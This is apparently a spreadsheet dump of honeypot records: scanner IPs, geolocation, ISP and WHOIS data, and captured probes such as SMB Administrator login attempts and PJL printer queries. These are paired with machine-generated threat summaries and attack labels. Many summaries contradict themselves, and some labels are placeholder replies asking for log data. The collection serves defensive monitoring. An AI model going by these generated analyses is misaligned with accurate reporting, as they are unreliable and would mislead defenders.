1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'BHNL0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JFGC0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PKOA0'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CEGA0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'EFDE0'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:2d9c:8042</t>
  </si>
  <si>
    <t>Possible attempted unauthorized access to a MySQL database, possibly for exploitation or data theft.
No successful connection made to the service as indicated by "NA" status.
Data extraction or manipulation could be the malicious intent behind this activity. &amp;&amp; No malicious activity is indicated by the log data provided. This suggests that either the services being monitored are inactive or there have been no attempts to access them. &amp;&amp; Unknown connection attempt to PJL service, possibly a scanning or probing activity by an attacker to identify vulnerable services. This could be a precursor to further exploitation of the system. It may indicate a reconnaissance phase of a potential attack. &amp;&amp; No log data provided, unable to analyze malicious activity.</t>
  </si>
  <si>
    <t>bb11e022298917a2778b7016700a4099</t>
  </si>
  <si>
    <t>45.156.130.25</t>
  </si>
  <si>
    <t>NA&amp;&amp;sh-phx-us-gp1-wk109a.internet-census.org</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_IRC_H32&amp;&amp;SMA-LAB_IRC_H47&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_PJL_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;1521&amp;&amp;110&amp;&amp;143&amp;&amp;5432&amp;&amp;3389&amp;&amp;80&amp;&amp;6667&amp;&amp;161&amp;&amp;NA&amp;&amp;389&amp;&amp;445&amp;&amp;6379&amp;&amp;23&amp;&amp;36736&amp;&amp;39599</t>
  </si>
  <si>
    <t>AZ</t>
  </si>
  <si>
    <t>Arizona</t>
  </si>
  <si>
    <t>Maricopa</t>
  </si>
  <si>
    <t>Phoenix</t>
  </si>
  <si>
    <t>5308655</t>
  </si>
  <si>
    <t>85001</t>
  </si>
  <si>
    <t>33.4484</t>
  </si>
  <si>
    <t>-112.074</t>
  </si>
  <si>
    <t>Inap PHX</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;query&amp;&amp;request&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMB:Incoming connection (45.156.130.25,45738)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.130.25;rport=48078'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HHAM0'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.130.25,45238)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.130.25;rport=38157'}}&amp;&amp;{Data_SMB:Incoming connection (45.156.130.25,35098)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KGBB0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
@PJL INFO ID_x000D_
@PJL INFO PRODINFO_x000D_
'}}&amp;&amp;{Data_RDP:NA}</t>
  </si>
  <si>
    <t>::ffff:2d9c:8219</t>
  </si>
  <si>
    <t>This log indicates that there was no activity detected using POP3 protocol, suggesting that an attacker may have attempted to scan or probe for potential vulnerabilities related to this service but did not engage in any malicious behavior. Alternatively, it could be a legitimate user accessing the service successfully and thus the data is marked as NA indicating normal usage. &amp;&amp; The log indicates an attempt to extract printer configuration information, possibly for malicious purposes such as identifying vulnerable devices or gathering sensitive data. This could be a reconnaissance step in a larger attack. The activity suggests the attacker is probing for potential targets to exploit. &amp;&amp; The system is receiving a series of status requests for printer information, which could be a reconnaissance attempt to gather details about the system's printing capabilities. The requests are likely trying to extract sensitive data from the system. This activity may indicate an attempted vulnerability scan or reconnaissance probe. &amp;&amp; There is no malicious activity detected, as there is insufficient log data to analyze. The logs are empty or unavailable.</t>
  </si>
  <si>
    <t>Printer Abuse &amp;&amp; Scan Attack 
Printer Attack &amp;&amp; I need log data to analyze. Please provide it.</t>
  </si>
  <si>
    <t>9a55978539bcb304d258fde60c139ee6</t>
  </si>
  <si>
    <t>183.97.11.203</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;53&amp;&amp;56939&amp;&amp;21383&amp;&amp;34422</t>
  </si>
  <si>
    <t>Yangpyeong-gun</t>
  </si>
  <si>
    <t>Yangpyeong-gun (Yongmun-myeon)</t>
  </si>
  <si>
    <t>1832832</t>
  </si>
  <si>
    <t>37.5197</t>
  </si>
  <si>
    <t>127.588</t>
  </si>
  <si>
    <t>::ffff:b761:bcb</t>
  </si>
  <si>
    <t>b3de7b6dddd65300ab46606cf500881d</t>
  </si>
  <si>
    <t>118.43.215.230</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;32411&amp;&amp;44844&amp;&amp;NA</t>
  </si>
  <si>
    <t>Seongnam-si (Buljeong-ro)</t>
  </si>
  <si>
    <t>37.3589</t>
  </si>
  <si>
    <t>127.115</t>
  </si>
  <si>
    <t>::ffff:762b:d7e6</t>
  </si>
  <si>
    <t>No recent TELNET connection attempts were detected within the monitored period, indicating no immediate malicious activity for this service. 
TELNET connections are typically used to access and manage remote devices but can also be targeted by attackers for unauthorized access.
The absence of any recent TELNET attempts may suggest that this particular attack vector is not currently being targeted by malicious actors. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No malicious activity detected, data for telnet service is unavailable or not applicable. 
Telnet service was either not used or not monitored during the time period of the log.
No unusual connections or activity reported for this service.</t>
  </si>
  <si>
    <t>af8dc75b11f9140e47cfc357095d67b7</t>
  </si>
  <si>
    <t>118.40.88.41</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;15000&amp;&amp;NA</t>
  </si>
  <si>
    <t>29</t>
  </si>
  <si>
    <t>Gwangju</t>
  </si>
  <si>
    <t>Seo-gu</t>
  </si>
  <si>
    <t>Nongseong-dong</t>
  </si>
  <si>
    <t>8691507</t>
  </si>
  <si>
    <t>502200</t>
  </si>
  <si>
    <t>35.1542</t>
  </si>
  <si>
    <t>126.888</t>
  </si>
  <si>
    <t>Kornet</t>
  </si>
  <si>
    <t>::ffff:7628:5829</t>
  </si>
  <si>
    <t>There is insufficient information to analyze malicious activity.
This suggests that there are no recorded events or attempts detected.
The absence of log data makes it impossible to determine any potential threats. &amp;&amp; No log data provided, unable to analyze.</t>
  </si>
  <si>
    <t>I need some log data to analyze! Please provide the log data, and I'll identify the type of attack.</t>
  </si>
  <si>
    <t>7b54f875d5300412cc8be2048aa8081e</t>
  </si>
  <si>
    <t>177.36.244.198</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;25545</t>
  </si>
  <si>
    <t>PA</t>
  </si>
  <si>
    <t>Pará</t>
  </si>
  <si>
    <t>Redenção</t>
  </si>
  <si>
    <t>6318107</t>
  </si>
  <si>
    <t>-8.02861</t>
  </si>
  <si>
    <t>-50.0314</t>
  </si>
  <si>
    <t>262404</t>
  </si>
  <si>
    <t>JC SERVICOS DE INTERNET LTDA</t>
  </si>
  <si>
    <t>Jc Telecom-Filial Conceição</t>
  </si>
  <si>
    <t>::ffff:b124:f4c6</t>
  </si>
  <si>
    <t>No log data is available, so there's nothing to analyze or describe. &amp;&amp; This indicates that there was an attempted connection to a TELNET service, but it did not succeed or was not detected by the monitoring system. No further activity was observed through this method. The attempt may have been abandoned or not malicious in nature. &amp;&amp; No relevant data provided.</t>
  </si>
  <si>
    <t>I need the log data to analyze the attacks. Please provide it, and I'll identify the types of attacks accordingly. &amp;&amp; Port scan</t>
  </si>
  <si>
    <t>a8e81e17d4d0a0ac09d71224aeaeb632</t>
  </si>
  <si>
    <t>222.254.76.56</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;33812&amp;&amp;NA&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>69</t>
  </si>
  <si>
    <t>Thái Nguyên Province</t>
  </si>
  <si>
    <t>Thành Phố Thái Nguyên</t>
  </si>
  <si>
    <t>Thái Nguyên</t>
  </si>
  <si>
    <t>1566319</t>
  </si>
  <si>
    <t>21.5942</t>
  </si>
  <si>
    <t>105.848</t>
  </si>
  <si>
    <t>45899</t>
  </si>
  <si>
    <t>VNPT Corp</t>
  </si>
  <si>
    <t>VietNam Post and Telecom Corporation</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50222)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,63952)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,64070)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,59167)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,18059)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,63885)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,63987)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,49327)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50131)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,54787)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,55153)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,55373)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,55583)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56009)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56229)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56443)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56690)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56864)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57091)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57486)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,57650)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,3751)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50108)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,49551)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,51041)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,52704)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,56804)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,58484)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,51024)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,51071)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,65346)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,38713)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,59960)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,62015)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,62106)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,49943)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,61874)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,61984)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50556)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,50653)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (222.254.76.56,58090)}</t>
  </si>
  <si>
    <t>::ffff:defe:4c38</t>
  </si>
  <si>
    <t>4ee3e571d39247ba319768f4f4e75aa5</t>
  </si>
  <si>
    <t>213.137.74.95</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;23546&amp;&amp;NA</t>
  </si>
  <si>
    <t>Petach Tikva</t>
  </si>
  <si>
    <t>Rosh HaAyin</t>
  </si>
  <si>
    <t>293690</t>
  </si>
  <si>
    <t>32.1083</t>
  </si>
  <si>
    <t>34.9689</t>
  </si>
  <si>
    <t>51825</t>
  </si>
  <si>
    <t>Telzar 019 International Telecommunications Services LTD</t>
  </si>
  <si>
    <t>Hallo ISP</t>
  </si>
  <si>
    <t>::ffff:d589:4a5f</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze or describe any malicious activity. &amp;&amp; No log data provided, unable to analyze activity.</t>
  </si>
  <si>
    <t>a4450b5469c60d3f26f939a4cc5351ab</t>
  </si>
  <si>
    <t>122.116.7.184</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-116-7-184.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>23&amp;&amp;NA</t>
  </si>
  <si>
    <t>25.0334</t>
  </si>
  <si>
    <t>121.566</t>
  </si>
  <si>
    <t>3462</t>
  </si>
  <si>
    <t>Chunghwa Telecom Co., Ltd.</t>
  </si>
  <si>
    <t>Chunghwa Telecom Co. Ltd.</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>1994-03-19 05:00:00</t>
  </si>
  <si>
    <t>2028-03-20 04:00:00</t>
  </si>
  <si>
    <t>2024-10-16 01:20:34</t>
  </si>
  <si>
    <t>['ANS1.HINET.NET', 'ANS2.HINET.NET', 'ANS3.HINET.TW']</t>
  </si>
  <si>
    <t>Net-Chinese Co., Ltd.</t>
  </si>
  <si>
    <t>['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']</t>
  </si>
  <si>
    <t>REDACTED FOR PRIVACY</t>
  </si>
  <si>
    <t>['foreign@net-chinese.com.tw', 'vnsadm@hinet.net']</t>
  </si>
  <si>
    <t>::ffff:7a74:7b8</t>
  </si>
  <si>
    <t>b2ab7ed0600fff1aa8a9ad8e45798495</t>
  </si>
  <si>
    <t>128.14.181.118</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;55820</t>
  </si>
  <si>
    <t>Los Angeles</t>
  </si>
  <si>
    <t>5368361</t>
  </si>
  <si>
    <t>90009</t>
  </si>
  <si>
    <t>34.0549</t>
  </si>
  <si>
    <t>-118.243</t>
  </si>
  <si>
    <t>21859</t>
  </si>
  <si>
    <t>Zenlayer Inc</t>
  </si>
  <si>
    <t>ZENLA</t>
  </si>
  <si>
    <t>2016-09-07</t>
  </si>
  <si>
    <t>ZL-LAX3-004</t>
  </si>
  <si>
    <t>2018-01-12</t>
  </si>
  <si>
    <t>::ffff:800e:b576</t>
  </si>
  <si>
    <t>No suspicious activity detected via TELNET service, no incoming or outgoing connections reported.</t>
  </si>
  <si>
    <t>fd2bf6f57cc499636f23d21f57412824</t>
  </si>
  <si>
    <t>14.53.225.238</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>13606</t>
  </si>
  <si>
    <t>37.3654</t>
  </si>
  <si>
    <t>127.122</t>
  </si>
  <si>
    <t>2010-08-02</t>
  </si>
  <si>
    <t>::ffff:e35:e1ee</t>
  </si>
  <si>
    <t>No TELNET traffic was detected during this time frame, which suggests that an attacker may have been attempting to exploit a vulnerability or test for open connections but did not initiate any communication with the vulnerable service. This lack of activity could be indicative of reconnaissance or probing for potential vulnerabilities. It is also possible that no malicious TELNET activity occurred at all.</t>
  </si>
  <si>
    <t>8fddd7a1822e549cf1555a453487af2e</t>
  </si>
  <si>
    <t>205.210.31.54</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H3&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_SIP_H30&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_IMAP_H24&amp;&